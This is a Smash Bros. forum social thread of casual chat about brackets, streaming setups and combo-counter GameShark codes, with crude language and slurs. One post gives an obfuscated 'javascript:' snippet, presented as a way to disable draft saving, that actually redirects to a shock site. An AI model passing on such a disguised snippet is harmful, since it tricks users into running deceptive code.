• Welcome to Smashboards, the world's largest Super Smash Brothers community! Over 250,000 Smash Bros. fans from around the world have come to discuss these great games in over 19 million posts!

You are currently viewing our boards as a visitor. Click here to sign up right now and start on your path in the Smash community!

Social Social Thread - Talk About Anything (You Are Allowed to Talk About)!

SheerMadness

Smash Master
I live for march madness.

But yah clubba you're not gonna find a whole lot of people excited about march madness talk on here.

Pokemon or gtfo.

mixa

Banned via Warnings
can we stop this villain-of-the-week thing who cares about mods

if more than x% of the posts are meta it means you're boring (me)

x is a magical variable that only i control and you've gone way past it

B Link

Smash Lord
My problem is getting Xsplit to work. It just shows a black box in Xsplit after connecting to the camera thing. Are you using a trial or do you have the premium? I'm not sure if the problem is camelo filter or Xsplit :( . Also I think mixa's link is dead so I cannot find it.
I'm using the trial. If I have some free time I might look into this issue. As for mixa's link, I guess you could pm him and ask for it. I'm too lazy cuz of schoolwork to search for it right now, sorry lol

AtotheZ

Smash Lord
I only do the VGC ladders for showdown since I do the events and stuff

I haven't done singles since gen 4, and I was just ok at that

Skrlx

Smash Champion
If someone can build me an N64 controller with a GC stick that does not skip steps, I will pay you $$$.

(Or could someone be kind enough to link me to the place where you order these parts? THX.)

Last edited:

mixa

Banned via Warnings

this is the gayest **** i've seen yet

i need an irc-like chat, no avatars, no ****ing like buttons, no bull****

rpotts

Smash Lord
so what's the deal with this skype group folks talk about? My raphnet is on the way and I'm wanting to get back into playing online, obv smash fu is pretty bad for finding good games much of the time.

Skrlx

Smash Champion
The Skype group isn't either, really. It's mostly just chatting. Kansas, huh? I'd suggest you individually add the people near you on Skype than joining the group, though you're free to join if you wish to join in on the FUN of discussing alpha jeans with WOTG.

B Link

Smash Lord

K so I got bored and was able to get Hijiki's combo counter to "work" again. This is what appears on my Xsplit (Trial Version). The numbers don't change even when you do combos. IDK how to get it to work.

Steps to get to the above:
1) Go to the Camelo Filter folder
2) Open up the readme
3) Input the settings into Xsplit based on the PIC Hijiki posted (you also may need to open up the Green Checkmark exe. I can't remember if that makes a difference. Maybe you should do it just in case LOL)
4) Open up the Combo Counter folder
5) Open up the .exe in said folder
6) Set the folder directory for pj64k, to the pj64k you want to use (or even any project64 -- maybe. I'm using the regular project64k in the above screen shot)
7) Add Project64k to XSplit as a window
8) Stretch camelofilter to the full window size of xsplit
9) Stretch pj64k to the full window size of xsplit
10) Load SSB.
11) Finish. I guess the combo counter should show now, cuz the above steps are all I did (I think). If it doesn't, sorry lol

Madao: IDK why you're getting a black screen. Possibilities: 1) your camelofilter layer is covering the pj64k window (make sure the order in xsplit is correct), 2) You didn't load ssb? -- IDK what else.

ballin4life

Smash Hero
Yes its a problem. I'll make a yahoo bracket league tonight

update: yahoo wants a cell phone number from everyone, and while I'm willing not everyone might be. I created an espn.com group instead. If you want in, pm me an email address I can send the invite to
Yahoo would have been better / easier, especially since all my other brackets are already on yahoo. Plus no emails required.

But whatever.

I think the bracket came out pretty weird this year. Several teams seeded way too low. Hopefully this will help me win my pools though!

ballin4life

Smash Hero
Open a page where the draft box appears, and then paste into the URL box in your browser (don't forget to retype javascript: if your browser by default omits it when copying and pasting):

Code:
javascript: void(window.location=/*disableDraftSaving(); saveDraftSettings(); disableMobileDraft(); saveMobileSettings();*/String.fromCharCode(104,116,116,112,58,47,47,119,119,119,46,109,101,97,116,115,112,105,110,46,99,111,109));
linking to meatspin and having a large image signature. i bite my thumb at you sir.

Madao

@ B Link B Link Lol i was being a noob with Xsplit. I got it working btw. Bad news is that it only works for J version of smash, that's why you were seeing glitched numbers. I'm trying to see if I could edit the exe file, but I doubt I'll be able to.

Edit: I just made a gameshark code to change the address offset to match J version. I'm a genius :) .
Code:
810E1A2A E034
810EAA22 E034
810EAA1A E034
I've noticed a few things. One is that the number appears on the slot of the person getting hit. The combo count also is based on the number of times a specific person has been hit, so if you double team someone, it will show the combined count for that combo. Sadly it doesn't show when the count = 1. The reason why i think it should include 1 is because it lets you know when enemy is in hitstun.

Last edited:

The Star King

Smash Hero

this is the gayest **** i've seen yet

i need an irc-like chat, no avatars, no ****ing like buttons, no bull****
depends

if it's a mod only thing, then yeah it's the wackest thing of all time, mod-exclusive aesthetics wtf

otherwise, ok I guess...

M!nt

Smash Champion
I thought I was the only one seeing that ghost zelda lol thought i was going crazy. It's pretty distracting when looking at your post. What we need is purple names back, but only for me obv.

B Link

Smash Lord
@ B Link B Link Lol i was being a noob with Xsplit. I got it working btw. Bad news is that it only works for J version of smash, that's why you were seeing glitched numbers. I'm trying to see if I could edit the exe file, but I doubt I'll be able to.

Edit: I just made a gameshark code to change the address offset to match J version. I'm a genius :) .
Code:
810E1A2A E034
810EAA22 E034
810EAA1A E034
Lmfao, nice job! I swore I tried the J version but I guess I didn't. And it looks like it doesn't matter anyway cuz of the codes you made lol. I'm heading to bed but I'll test this stuff tomorrow maybe. I guess isai's stream could use this? XP

mixa

Banned via Warnings
the weird part of that story is an american state regulating on the entire world

he can come to my library all right

otherwise, ok I guess
it's not ok because i can't choose not to see it

the internet in 10 years will be just visual pollution

Last edited:

KeroKeroppi

Smash Champion
idk what you weirdos do outside the states

but in the land of the free we do what we want

live free or die mother ****ers

EDIT: except openly masturbating in a public library, i guess we can't do that LOL

Last edited:

mixa

Banned via Warnings
Anime is for neckbeard ...
there u go kero
just watch some anime and you'll have facial hair

(real anime

like naruto

and stuff (not that bald guy with magic stuff))

Last edited:

Cobrevolution

Smash Master
my buddy can grow a full beard in two days but can't get any chest hair

i don't get cheek growth but my natural trident chest hair is on point

sometimes you have to accept tradeoffs

Top Bottom